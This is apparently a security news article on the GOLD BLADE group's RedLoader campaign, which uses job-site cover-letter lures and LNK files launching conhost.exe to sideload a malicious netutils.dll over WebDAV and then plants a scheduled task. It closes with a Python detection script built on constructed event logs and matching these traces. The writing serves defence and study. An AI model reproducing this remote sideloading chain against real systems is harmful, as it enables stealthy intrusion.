Threat Actors Weaponize LNK Files to Deploy RedLoader Malware on Windows Systems


The cybersecurity landscape faces a renewed threat as the GOLD BLADE cybercriminal group has significantly evolved their attack methodology, combining previously observed techniques to create a sophisticated infection chain.

This new campaign, which surged in July 2025, leverages malicious LNK files paired with a recycled WebDAV technique to deploy their custom RedLoader malware on Windows systems.

The threat represents a concerning escalation in the group’s capabilities, demonstrating how established threat actors continuously adapt their tactics to evade detection and maximize infection success rates.


The attack begins with a deceptively simple social engineering approach, where threat actors distribute well-crafted cover letter PDFs through legitimate third-party job sites such as Indeed.com.

These documents contain malicious links that automatically download ZIP archives to victims’ systems, initiating a complex multi-stage infection process.

Figure: The observed RedLoader execution chain (Source: Sophos)

The sophistication lies not in the initial delivery mechanism, but in the subsequent execution chain that combines legitimate system processes with malicious payloads to establish persistent access while remaining largely undetected by traditional security measures.

Sophos analysts identified this new infection chain while investigating the GOLD BLADE group’s evolving tactics, noting that while the individual components had been observed separately in previous campaigns, their combination represents an unprecedented approach to initial system compromise.

The researchers observed that the group previously utilized WebDAV techniques for remote DLL execution in September 2024 and DLL sideloading methods in March 2025, but the July 2025 campaign marks the first documented instance of these techniques being orchestrated together.

Remote DLL Sideloading: A Technical Deep Dive

The most technically sophisticated aspect of this campaign involves the remote DLL sideloading mechanism that serves as the foundation for RedLoader deployment.

Once the LNK file executes, it triggers conhost.exe to establish a WebDAV connection to the Cloudflare-hosted domain automatinghrservices[.]workers[.]dev.

The malicious infrastructure hosts a renamed version of Adobe’s legitimate ADNotificationManager.exe executable, which masquerades as a resume document to maintain the social engineering pretense.

The critical technical innovation lies in the remote sideloading process, where the legitimate executable automatically loads the malicious netutils.dll file from the same remote directory.

Because the process doing the loading is a legitimately signed executable, the malicious code runs under a trusted binary without triggering typical security alerts.

RedLoader stage 1 then establishes persistence through a scheduled task named BrowserQEBrowserQE_, demonstrating the malware’s capability to create victim-specific identifiers while maintaining consistent operational signatures across different compromised systems.
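The chain described above leaves three observable traces a defender can hunt for in endpoint telemetry: conhost.exe launched from Explorer with a remote (UNC/WebDAV) path on its command line, a DLL image loaded from a remote path or a known-sideloaded DLL name loaded from outside System32, and the creation of the BrowserQEBrowserQE_ scheduled task. The following Python is an added example, not code from the Sophos report; the Sysmon-style events are constructed and simplified, and the file name resume.exe is an assumed stand-in for the renamed ADNotificationManager.exe.

```python
import ntpath
import re

# Constructed, simplified Sysmon-style records (not telemetry from the actual campaign).
# id 1 = process create, id 7 = image load, id 11 = file create.
# WebDAV shares surface to Windows as UNC paths of the form \\host@SSL\DavWWWRoot\...;
# the domain is kept defanged as in the report, and resume.exe is an assumed file name.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\conhost.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"conhost.exe \\automatinghrservices[.]workers[.]dev@SSL\DavWWWRoot\resume.exe"},
    {"id": 7, "image": r"\\automatinghrservices[.]workers[.]dev@SSL\DavWWWRoot\resume.exe",
     "loaded": r"\\automatinghrservices[.]workers[.]dev@SSL\DavWWWRoot\netutils.dll"},
    {"id": 7, "image": r"C:\Program Files\Vendor\app.exe",
     "loaded": r"C:\Windows\System32\netutils.dll"},            # benign: the system copy
    {"id": 11, "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\Tasks\BrowserQEBrowserQE_"},
]

UNC_RE = re.compile(r"\\\\[^\\\s]+\\")          # \\host\...  (SMB or WebDAV share)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SIDELOAD_DLLS = {"netutils.dll"}                # DLL name abused in this campaign
TASK_NAME = "BrowserQEBrowserQE_"               # persistence task name reported by Sophos


def is_remote(path):
    """True when the path is a UNC path, i.e. the file lives on a remote share."""
    return UNC_RE.match(path) is not None


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def detect(events):
    """Return (rule, evidence) tuples for events matching the RedLoader execution chain."""
    findings = []
    for e in events:
        if e["id"] == 1 and e["image"].lower().endswith(r"\conhost.exe") \
                and e["parent"].lower().endswith(r"\explorer.exe") and UNC_RE.search(e["cmd"]):
            findings.append(("conhost_remote_launch", e["cmd"]))   # LNK-style launch of a remote file
        elif e["id"] == 7:
            name = ntpath.basename(e["loaded"]).lower()
            if is_remote(e["loaded"]):
                findings.append(("remote_dll_load", e["loaded"]))  # DLL pulled over WebDAV/SMB
            elif name in SIDELOAD_DLLS and not in_system_dir(e["loaded"]):
                findings.append(("local_dll_sideload", e["loaded"]))  # known name outside System32
        elif e["id"] == 11 and ntpath.basename(e["target"]) == TASK_NAME:
            findings.append(("redloader_task", e["target"]))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The local_dll_sideload rule generalizes beyond the remote case on this page: it also catches netutils.dll dropped next to a signed binary on disk, which is the March 2025 variant the article mentions.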

